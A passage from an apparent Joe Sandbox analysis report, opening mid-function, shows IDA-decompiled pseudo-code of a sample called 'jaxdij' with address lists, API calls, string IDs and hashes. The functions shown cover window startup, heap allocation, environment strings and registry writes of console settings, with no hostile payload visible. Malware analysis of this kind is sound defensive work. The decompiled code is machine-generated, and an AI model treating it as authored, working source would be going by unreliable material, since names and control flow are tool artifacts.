							 *_t439 = 0x264914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t282 = E002420C0(__eflags);
							_t440 = _t439 - 0x10;
							 *0x26491c = _t282;
							__eflags = _t282;
							if(_t282 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t440 = 0x264914;
									_t284 = E00242420(0);
									_t441 = _t440 - 4;
									__eflags = _t284;
									if(_t284 != 0) {
										 *_t441 =  &_v144;
										GetStartupInfoW(??);
										_t442 = _t441 - 4;
										 *_t442 = _v132;
										_t287 = E00251259();
										 *_t442 = 0x264914;
										_v176 = _v132;
										_v172 = _t287 << 1;
										E00242790();
										_t443 = _t442 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t374 =  *0x2649bc; // 0x0
										 *_t443 = _t374;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t444 = _t443 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t440 = 0xfffffff6;
									_t299 = GetStdHandle(??);
									_t446 = _t440 - 4;
									 *0x2649c4 = _t299;
									 *_t446 = 0xfffffff5;
									_t300 = GetStdHandle(??);
									_t444 = _t446 - 4;
									 *0x2649c8 = _t300;
									__eflags =  *0x2649c4;
									if( *0x2649c4 != 0) {
										L59:
										 *_t444 = 0x264914;
										E002422F0();
										_t444 = _t444 - 4;
										__eflags =  *0x264920;
										if( *0x264920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t444 = 0x264914;
											_t304 = E00242380();
											_t444 = _t444 - 4;
											__eflags = _t304;
											if(_t304 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0x2649c8;
										if( *0x2649c8 == 0) {
											 *0x264928 = 1;
											L64:
											L71:
											 *_t444 = 0x264914;
											_v176 = _v32;
											_v16 = E002429C0();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}
































































                                                                                                                          0x002418e7
                                                                                                                          0x002418ee
                                                                                                                          0x002418f5
                                                                                                                          0x002418fc
                                                                                                                          0x00241903
                                                                                                                          0x0024190a
                                                                                                                          0x00241911
                                                                                                                          0x00241918
                                                                                                                          0x0024191f
                                                                                                                          0x00241926
                                                                                                                          0x0024192d
                                                                                                                          0x00241932
                                                                                                                          0x00241939
                                                                                                                          0x00241961
                                                                                                                          0x0024199e
                                                                                                                          0x002419a7
                                                                                                                          0x002419c3
                                                                                                                          0x002419e6
                                                                                                                          0x002419ef
                                                                                                                          0x002419fe
                                                                                                                          0x00241a17
                                                                                                                          0x00241a1d
                                                                                                                          0x00241a20
                                                                                                                          0x00241a2d
                                                                                                                          0x00241a3c
                                                                                                                          0x00241a4b
                                                                                                                          0x00241a5a
                                                                                                                          0x00241a69
                                                                                                                          0x00241a78
                                                                                                                          0x00241a87
                                                                                                                          0x00241a97
                                                                                                                          0x00241aaa
                                                                                                                          0x00241ab9
                                                                                                                          0x00241ac9
                                                                                                                          0x00241adc
                                                                                                                          0x00241aef
                                                                                                                          0x00241aff
                                                                                                                          0x00241b08
                                                                                                                          0x00241b0e
                                                                                                                          0x00241b11
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241b17
                                                                                                                          0x00241b1f
                                                                                                                          0x00241b21
                                                                                                                          0x00241b24
                                                                                                                          0x00241b2c
                                                                                                                          0x00241b32
                                                                                                                          0x00241b38
                                                                                                                          0x00241b3b
                                                                                                                          0x00241b40
                                                                                                                          0x00241b47
                                                                                                                          0x00241b4a
                                                                                                                          0x00241b4d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241b53
                                                                                                                          0x00241b63
                                                                                                                          0x00241b63
                                                                                                                          0x00241b6b
                                                                                                                          0x00241b71
                                                                                                                          0x00241b76
                                                                                                                          0x00241b7b
                                                                                                                          0x00241b85
                                                                                                                          0x00241b8a
                                                                                                                          0x00241b8d
                                                                                                                          0x00241b95
                                                                                                                          0x00241b9a
                                                                                                                          0x00241b9f
                                                                                                                          0x00241ba2
                                                                                                                          0x00241bb4
                                                                                                                          0x00241bbb
                                                                                                                          0x00241bbe
                                                                                                                          0x00241bc1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241bd7
                                                                                                                          0x00241bda
                                                                                                                          0x00241bde
                                                                                                                          0x00241be3
                                                                                                                          0x00241be6
                                                                                                                          0x00241c08
                                                                                                                          0x00241c0b
                                                                                                                          0x00241c0f
                                                                                                                          0x00241c14
                                                                                                                          0x00241c17
                                                                                                                          0x00241c4d
                                                                                                                          0x00241c50
                                                                                                                          0x00241c54
                                                                                                                          0x00241c59
                                                                                                                          0x00241c5c
                                                                                                                          0x00241cfa
                                                                                                                          0x00241cfd
                                                                                                                          0x00241d01
                                                                                                                          0x00241d06
                                                                                                                          0x00241d09
                                                                                                                          0x00241da7
                                                                                                                          0x00241daa
                                                                                                                          0x00241dae
                                                                                                                          0x00241db3
                                                                                                                          0x00241db6
                                                                                                                          0x00241e2e
                                                                                                                          0x00241e31
                                                                                                                          0x00241e35
                                                                                                                          0x00241e3a
                                                                                                                          0x00241e3d
                                                                                                                          0x00241ea7
                                                                                                                          0x00241e43
                                                                                                                          0x00241e46
                                                                                                                          0x00241e49
                                                                                                                          0x00241e4c
                                                                                                                          0x00241e4f
                                                                                                                          0x00241e70
                                                                                                                          0x00241e73
                                                                                                                          0x00241e77
                                                                                                                          0x00241e84
                                                                                                                          0x00241e8c
                                                                                                                          0x00241e90
                                                                                                                          0x00000000
                                                                                                                          0x00241e96
                                                                                                                          0x00241e96
                                                                                                                          0x00241e96
                                                                                                                          0x00241e55
                                                                                                                          0x00241e55
                                                                                                                          0x00241e55
                                                                                                                          0x00241e4f
                                                                                                                          0x00241dbc
                                                                                                                          0x00241dbf
                                                                                                                          0x00241dc2
                                                                                                                          0x00241dc5
                                                                                                                          0x00241dc8
                                                                                                                          0x00241de9
                                                                                                                          0x00241dec
                                                                                                                          0x00241df0
                                                                                                                          0x00241dfd
                                                                                                                          0x00241e03
                                                                                                                          0x00241e07
                                                                                                                          0x00000000
                                                                                                                          0x00241e0d
                                                                                                                          0x00241e0d
                                                                                                                          0x00241e0d
                                                                                                                          0x00241dce
                                                                                                                          0x00241dce
                                                                                                                          0x00241dce
                                                                                                                          0x00241dc8
                                                                                                                          0x00241d0f
                                                                                                                          0x00241d12
                                                                                                                          0x00241d15
                                                                                                                          0x00241d18
                                                                                                                          0x00241d1b
                                                                                                                          0x00241d3c
                                                                                                                          0x00241d3f
                                                                                                                          0x00241d43
                                                                                                                          0x00241d50
                                                                                                                          0x00241d53
                                                                                                                          0x00241d57
                                                                                                                          0x00241d6a
                                                                                                                          0x00241d6a
                                                                                                                          0x00241d71
                                                                                                                          0x00000000
                                                                                                                          0x00241d77
                                                                                                                          0x00241d7d
                                                                                                                          0x00241d80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241d80
                                                                                                                          0x00241d5d
                                                                                                                          0x00241d5d
                                                                                                                          0x00241d64
                                                                                                                          0x00241d86
                                                                                                                          0x00241d86
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241d64
                                                                                                                          0x00241d21
                                                                                                                          0x00241d21
                                                                                                                          0x00241d21
                                                                                                                          0x00241d1b
                                                                                                                          0x00241c62
                                                                                                                          0x00241c65
                                                                                                                          0x00241c68
                                                                                                                          0x00241c6b
                                                                                                                          0x00241c6e
                                                                                                                          0x00241c8f
                                                                                                                          0x00241c92
                                                                                                                          0x00241c96
                                                                                                                          0x00241ca3
                                                                                                                          0x00241ca6
                                                                                                                          0x00241caa
                                                                                                                          0x00241cbd
                                                                                                                          0x00241cbd
                                                                                                                          0x00241cc4
                                                                                                                          0x00000000
                                                                                                                          0x00241cca
                                                                                                                          0x00241cd0
                                                                                                                          0x00241cd3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241cd3
                                                                                                                          0x00241cb0
                                                                                                                          0x00241cb0
                                                                                                                          0x00241cb7
                                                                                                                          0x00241cd9
                                                                                                                          0x00241cd9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241cb7
                                                                                                                          0x00241c74
                                                                                                                          0x00241c74
                                                                                                                          0x00241c74
                                                                                                                          0x00241c6e
                                                                                                                          0x00241c1d
                                                                                                                          0x00241c1d
                                                                                                                          0x00241c27
                                                                                                                          0x00241c31
                                                                                                                          0x00000000
                                                                                                                          0x00241c31
                                                                                                                          0x00241bec
                                                                                                                          0x00241bec
                                                                                                                          0x00241eb3
                                                                                                                          0x00241eb9
                                                                                                                          0x00000000
                                                                                                                          0x00241eb9
                                                                                                                          0x00000000
                                                                                                                          0x00241be6
                                                                                                                          0x00241ec1
                                                                                                                          0x00241ec8
                                                                                                                          0x00241eda
                                                                                                                          0x00241ede
                                                                                                                          0x00241ee4
                                                                                                                          0x00241ee4
                                                                                                                          0x00241eeb
                                                                                                                          0x00241eef
                                                                                                                          0x00241ef5
                                                                                                                          0x00241ef5
                                                                                                                          0x00241f08
                                                                                                                          0x00241f0b
                                                                                                                          0x00241f13
                                                                                                                          0x00241f17
                                                                                                                          0x00241f1b
                                                                                                                          0x00241f20
                                                                                                                          0x00241f23
                                                                                                                          0x00241f28
                                                                                                                          0x00241f2b
                                                                                                                          0x00241f3d
                                                                                                                          0x00241f41
                                                                                                                          0x00241fe9
                                                                                                                          0x00241fec
                                                                                                                          0x00241ff1
                                                                                                                          0x00241ff4
                                                                                                                          0x00241ff7
                                                                                                                          0x0024200f
                                                                                                                          0x00242012
                                                                                                                          0x00242018
                                                                                                                          0x0024201e
                                                                                                                          0x00242021
                                                                                                                          0x00242032
                                                                                                                          0x00242035
                                                                                                                          0x00242039
                                                                                                                          0x0024203d
                                                                                                                          0x00242042
                                                                                                                          0x0024204b
                                                                                                                          0x0024204e
                                                                                                                          0x00242068
                                                                                                                          0x00242054
                                                                                                                          0x00242058
                                                                                                                          0x00242058
                                                                                                                          0x00242079
                                                                                                                          0x0024207f
                                                                                                                          0x00242082
                                                                                                                          0x00242086
                                                                                                                          0x0024208c
                                                                                                                          0x00000000
                                                                                                                          0x00241ffd
                                                                                                                          0x00241ffd
                                                                                                                          0x00241ffd
                                                                                                                          0x00241f47
                                                                                                                          0x00241f47
                                                                                                                          0x00241f4e
                                                                                                                          0x00241f54
                                                                                                                          0x00241f57
                                                                                                                          0x00241f5c
                                                                                                                          0x00241f63
                                                                                                                          0x00241f69
                                                                                                                          0x00241f6c
                                                                                                                          0x00241f71
                                                                                                                          0x00241f78
                                                                                                                          0x00241f8b
                                                                                                                          0x00241f91
                                                                                                                          0x00241f94
                                                                                                                          0x00241f99
                                                                                                                          0x00241f9c
                                                                                                                          0x00241fa3
                                                                                                                          0x00241fcf
                                                                                                                          0x00000000
                                                                                                                          0x00241fa9
                                                                                                                          0x00241faf
                                                                                                                          0x00241fb2
                                                                                                                          0x00241fb7
                                                                                                                          0x00241fba
                                                                                                                          0x00241fbd
                                                                                                                          0x00000000
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fc3
                                                                                                                          0x00241fbd
                                                                                                                          0x00241f7e
                                                                                                                          0x00241f7e
                                                                                                                          0x00241f85
                                                                                                                          0x00241fd4
                                                                                                                          0x00241fde
                                                                                                                          0x0024208f
                                                                                                                          0x00242098
                                                                                                                          0x0024209b
                                                                                                                          0x002420a7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00241f85
                                                                                                                          0x00241f78
                                                                                                                          0x00241f31
                                                                                                                          0x00241f31
                                                                                                                          0x00241f31
                                                                                                                          0x00241ece
                                                                                                                          0x00241ece
                                                                                                                          0x00241ece
                                                                                                                          0x00241ba8
                                                                                                                          0x00241ba8
                                                                                                                          0x00241ba8
                                                                                                                          0x0024193f
                                                                                                                          0x0024193f
                                                                                                                          0x0024193f
                                                                                                                          0x002420aa
                                                                                                                          0x002420b6

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AllocCreateReadSizeVirtual
                                                                                                                          • String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
                                                                                                                          • API String ID: 4119528295-967118136
                                                                                                                          • Opcode ID: 1d735eaf6acc2b0a1fa354339881fe2f2a4c891bae7cc06e8a8a8a9f4197e3fe
                                                                                                                          • Instruction ID: 96c38ac2c9d7e0e4e5c5e02ff8660d11ce6ce493286d0b5a4c47e07423946a25
                                                                                                                          • Opcode Fuzzy Hash: 1d735eaf6acc2b0a1fa354339881fe2f2a4c891bae7cc06e8a8a8a9f4197e3fe
                                                                                                                          • Instruction Fuzzy Hash: 30324A70919208CFDB14EFA8D588BADBBF0FF48304F10845DE885A7291D7B599A9CF52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024D760 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 143 24d760-24d76b SetUnhandledExceptionFilter
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0024D760() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0024D887); // executed
				return _t1;
			}




                                                                                                                          0x0024d765
                                                                                                                          0x0024d76b

                                                                                                                          APIs
                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_0000D887,0024D1E3), ref: 0024D765
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3192549508-0
                                                                                                                          • Opcode ID: 6010294edcf2d767dfb4272dae701b716bedd0285baf94be682ef4621e19a888
                                                                                                                          • Instruction ID: 324007abef9a20d0cdf7e53243388f990ea8d4badc9dc64a397a604c90e3486e
                                                                                                                          • Opcode Fuzzy Hash: 6010294edcf2d767dfb4272dae701b716bedd0285baf94be682ef4621e19a888
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00255B20 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00255B20() {
				WCHAR* _t1;
				void* _t3;
				void* _t17;
				WCHAR* _t19;

				_t1 = GetEnvironmentStringsW();
				_t19 = _t1;
				if(_t19 != 0) {
					_t11 = E00255B6E(_t19) - _t19 & 0xfffffffe;
					_t3 = E0025490E(E00255B6E(_t19) - _t19 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E0024F6F0(_t17, _t19, _t11);
					}
					E00253703(0);
					FreeEnvironmentStringsW(_t19);
					return _t17;
				} else {
					return _t1;
				}
			}







                                                                                                                          0x00255b23
                                                                                                                          0x00255b29
                                                                                                                          0x00255b2d
                                                                                                                          0x00255b3d
                                                                                                                          0x00255b41
                                                                                                                          0x00255b46
                                                                                                                          0x00255b4c
                                                                                                                          0x00255b51
                                                                                                                          0x00255b56
                                                                                                                          0x00255b5b
                                                                                                                          0x00255b62
                                                                                                                          0x00255b6d
                                                                                                                          0x00255b30
                                                                                                                          0x00255b30
                                                                                                                          0x00255b30

                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00250B86), ref: 00255B23
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,00250B86), ref: 00255B62
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnvironmentStrings$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3328510275-0
                                                                                                                          • Opcode ID: 665a93e8ed0586cb0602cd6b8df0def86e03ee60c7a47cfc45432dbfbb0240f9
                                                                                                                          • Instruction ID: f239c9e164c73e2aa85787f5427dcbc2447ed2368affa15cc552fe1e00c0f7ea
                                                                                                                          • Opcode Fuzzy Hash: 665a93e8ed0586cb0602cd6b8df0def86e03ee60c7a47cfc45432dbfbb0240f9
                                                                                                                          • Instruction Fuzzy Hash: 52E02B77514A3126922136387C8ED9F060DCFC177672A0115F81046185EE204C5604F9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0025490E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 128 25490e-25491a 129 25494c-254957 call 254824 128->129 130 25491c-25491e 128->130 138 254959-25495b 129->138 131 254937-254948 RtlAllocateHeap 130->131 132 254920-254921 130->132 134 254923-25492a call 250f3d 131->134 135 25494a 131->135 132->131 134->129 140 25492c-254935 call 253a3f 134->140 135->138 140->129 140->131
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0025490E(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00254824())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x2662dc, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00250F3D();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E00253A3F(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                                                                                                                          0x00254914
                                                                                                                          0x0025491a
                                                                                                                          0x0025494c
                                                                                                                          0x00254951
                                                                                                                          0x00254957
                                                                                                                          0x00000000
                                                                                                                          0x00254957
                                                                                                                          0x0025491e
                                                                                                                          0x00254920
                                                                                                                          0x00254920
                                                                                                                          0x00254937
                                                                                                                          0x00254940
                                                                                                                          0x00254948
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00254928
                                                                                                                          0x0025492a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0025492d
                                                                                                                          0x00254933
                                                                                                                          0x00254935
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00254935
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00255E78,?,?,?,00245730), ref: 00254940
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: a71d85223028f49b1b8e0ea8a8cb7cb9a5a9217b73716fdafd4ea04372752931
                                                                                                                          • Instruction ID: f5a910f5433fa50b22e5893abd83af11494f74babeb2f10651bd08f57d104df7
                                                                                                                          • Opcode Fuzzy Hash: a71d85223028f49b1b8e0ea8a8cb7cb9a5a9217b73716fdafd4ea04372752931
                                                                                                                          • Instruction Fuzzy Hash: B8E0E5311303625ADB313A61EC0675BBA5CAF017BBF5A4010EC05930D1CE70CCB885EC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 0024C500 Relevance: 74.0, APIs: 24, Strings: 18, Instructions: 467registrystringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 203 24c500-24c518 204 24c51e-24c536 call 2433b0 203->204 205 24c539 203->205 204->205 207 24c543-24c567 205->207 210 24c621-24c625 207->210 211 24c56d-24c571 207->211 214 24c63d-24c683 RegSetValueExW 210->214 215 24c62b-24c637 210->215 212 24c596-24c605 wsprintfW RegSetValueExW 211->212 213 24c577-24c590 211->213 216 24c608-24c61c 212->216 213->212 213->216 217 24c686-24c68a 214->217 215->214 215->217 216->207 219 24c690-24c69c 217->219 220 24c6a2-24c6e8 RegSetValueExW 217->220 219->220 221 24c6eb-24c6ef 219->221 220->221 222 24c6f5-24c701 221->222 223 24c707-24c750 RegSetValueExW 221->223 222->223 224 24c753-24c757 222->224 223->224 225 24c75d-24c784 lstrcmpW 224->225 226 24c78a-24c7dd lstrlenW RegSetValueExW 224->226 225->226 227 24c7e0-24c7e4 225->227 226->227 228 24c7fc-24c845 RegSetValueExW 227->228 229 24c7ea-24c7f6 227->229 230 24c848-24c84c 228->230 229->228 229->230 231 24c876-24c92c GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 230->231 232 24c852-24c85e 230->232 234 24c92f-24c933 231->234 232->231 233 24c864-24c870 232->233 233->231 233->234 235 24c939-24c945 234->235 236 24c94b-24c994 RegSetValueExW 234->236 235->236 237 24c997-24c99b 235->237 236->237 238 24c9b0-24c9f6 RegSetValueExW 237->238 239 24c9a1-24c9aa 237->239 240 24c9f9-24c9fd 238->240 239->238 239->240 241 24ca12-24ca58 RegSetValueExW 240->241 242 24ca03-24ca0c 240->242 243 24ca5b-24ca5f 241->243 242->241 242->243 244 24ca74-24caba RegSetValueExW 243->244 245 24ca65-24ca6e 243->245 246 24cabd-24cac1 244->246 245->244 245->246 247 24cad6-24cb1c RegSetValueExW 246->247 248 24cac7-24cad0 246->248 249 24cb1f-24cb23 247->249 248->247 248->249 250 24cb38-24cb7e RegSetValueExW 249->250 251 24cb29-24cb32 249->251 252 24cb81-24cb85 250->252 251->250 251->252 253 24cb9a-24cbe0 RegSetValueExW 252->253 254 24cb8b-24cb94 252->254 255 24cbe3-24cbe7 253->255 254->253 254->255 256 24cbed-24cbf6 255->256 257 24cc0b-24cc6d RegSetValueExW 255->257 256->257 258 24cbfc-24cc05 256->258 259 24cc70-24cc74 257->259 258->257 258->259 260 24cc8c-24ccd2 RegSetValueExW 259->260 261 24cc7a-24cc86 259->261 262 24ccd5-24ccd9 260->262 261->260 261->262 263 24ccfd-24cd5f RegSetValueExW 262->263 264 24ccdf-24cce8 262->264 266 24cd62-24cd6b 263->266 264->263 265 24ccee-24ccf7 264->265 265->263 265->266
                                                                                                                          APIs
                                                                                                                          • wsprintfW.USER32 ref: 0024C5B3
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C5FF
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C67D
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C6E2
                                                                                                                            • Part of subcall function 002433B0: GetDpiForSystem.USER32 ref: 0024341C
                                                                                                                            • Part of subcall function 002433B0: MulDiv.KERNEL32 ref: 00243435
                                                                                                                            • Part of subcall function 002433B0: GetDpiForSystem.USER32 ref: 00243446
                                                                                                                            • Part of subcall function 002433B0: MulDiv.KERNEL32 ref: 0024345F
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C74A
                                                                                                                          • lstrcmpW.KERNEL32 ref: 0024C778
                                                                                                                          • lstrlenW.KERNEL32 ref: 0024C795
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C7D7
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C83F
                                                                                                                          • GetDpiForSystem.USER32 ref: 0024C876
                                                                                                                          • MulDiv.KERNEL32 ref: 0024C891
                                                                                                                          • GetDpiForSystem.USER32 ref: 0024C8A0
                                                                                                                          • MulDiv.KERNEL32 ref: 0024C8BB
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C926
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C98E
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024C9F0
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CA52
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CAB4
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CB16
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CB78
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CBDA
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CC67
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CCCC
                                                                                                                          • RegSetValueExW.ADVAPI32 ref: 0024CD59
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$System$lstrcmplstrlenwsprintf
                                                                                                                          • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
                                                                                                                          • API String ID: 4202061470-2238697219
                                                                                                                          • Opcode ID: f508cf05dfd11a099b1546d500713d0497421c0ce19d5adeedc8d972eed08d75
                                                                                                                          • Instruction ID: b798a4bf41488a6502ff5d493ddca8e9f413d06ece2acd4b14075b4a4e4cf8a4
                                                                                                                          • Opcode Fuzzy Hash: f508cf05dfd11a099b1546d500713d0497421c0ce19d5adeedc8d972eed08d75
